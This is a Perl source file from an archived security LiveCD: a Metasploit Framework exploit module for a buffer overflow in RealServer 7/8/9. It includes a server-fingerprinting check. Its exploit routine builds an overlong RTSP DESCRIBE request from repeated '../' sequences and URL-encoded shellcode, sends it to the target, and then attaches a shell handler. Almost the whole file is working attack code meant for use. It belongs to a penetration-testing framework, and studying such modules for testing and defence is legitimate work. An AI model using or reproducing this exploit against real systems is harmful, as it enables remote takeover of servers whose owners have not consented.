home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / realserver_describe_linux.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  134 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::realserver_describe_linux;
  11. use base 'Msf::Exploit';
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'    => 'RealServer Describe Buffer Overflow',
  20.     'Version' => '$Revision: 1.29 $',
  21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  22.  
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'linux', 'bsd', 'win32' ],
  25.     'Priv'  => 1,
  26.  
  27.     'UserOpts'  =>
  28.       {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The RTSP port', 554],
  31.       },
  32.  
  33.     'Payload' =>
  34.       {
  35.         'Space'      => 2000,
  36.         'BadChars'  => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff :&?.=",
  37.         'Keys'      => ['+findsock'],
  38.  
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.         This module exploits a buffer overflow in RealServer 7/8/9 and was based
  43.         on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit
  44.         Linux, BSD, and Windows-based servers.
  45. }),
  46.  
  47.     'Refs'  =>
  48.       [
  49.         ['OSVDB',   '4468'],
  50.         ['URL',     'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
  51.         ['MIL',     '51'],
  52.       ],
  53.  
  54.     'DefaultTarget' => 0,
  55.     'Targets' => [['Universal Target']],
  56.  
  57.     'Keys'  => ['realserver'],
  58.  
  59.     'DisclosureDate' => 'Dec 20 2002',
  60.   };
  61.  
  62. sub new {
  63.     my $class = shift;
  64.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  65.     return($self);
  66. }
  67.  
  68. sub Check {
  69.     my $self = shift;
  70.     my $target_host = $self->GetVar('RHOST');
  71.     my $target_port = $self->GetVar('RPORT');
  72.  
  73.     my $s = Msf::Socket::Tcp->new
  74.       (
  75.         'PeerAddr'  => $target_host,
  76.         'PeerPort'  => $target_port,
  77.         'LocalPort' => $self->GetVar('CPORT'),
  78.         'SSL'       => $self->GetVar('SSL'),
  79.       );
  80.     if ($s->IsError) {
  81.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  82.         return $self->CheckCode('Connect');
  83.     }
  84.  
  85.     $s->Send("OPTIONS / RTSP/1.0\r\n\r\n");
  86.  
  87.     my $res = $s->Recv(-1, 5);
  88.     $s->Close();
  89.  
  90.     if ($res =~ m/^Server:([^\n]+)/sm)
  91.     {
  92.         my $svr = $1;
  93.         $svr =~ s/(^\s+|\r|\s+$)//g;
  94.         $self->PrintLine("[*] $svr");
  95.         return $self->CheckCode('Detected');
  96.     }
  97.     return $self->CheckCode('Safe');
  98. }
  99.  
  100. sub Exploit {
  101.     my $self = shift;
  102.     my $target_host = $self->GetVar('RHOST');
  103.     my $target_port = $self->GetVar('RPORT');
  104.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  105.  
  106.     $self->PrintLine("[*] RealServer universal exploit launched against $target_host");
  107.     $self->PrintLine("[*] Kill the master rmserver pid to prevent shell disconnect");
  108.  
  109.     my $encoded;
  110.     foreach (split(//, $shellcode)){ $encoded .= sprintf("%%%.2x", ord($_)) }
  111.  
  112.     my $req = "DESCRIBE /". ("../" x 560)  . "\xcc\xcc\x90\x90". $encoded. ".smi RTSP/1.0\r\n\r\n";
  113.  
  114.     my $s = Msf::Socket::Tcp->new
  115.       (
  116.         'PeerAddr'  => $target_host,
  117.         'PeerPort'  => $target_port,
  118.         'LocalPort' => $self->GetVar('CPORT'),
  119.         'SSL'       => $self->GetVar('SSL'),
  120.       );
  121.     if ($s->IsError) {
  122.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  123.         return;
  124.     }
  125.  
  126.     $s->Send($req);
  127.  
  128.     $self->Handler($s);
  129.  
  130.     return;
  131. }
  132.  
  133. 1;
  134.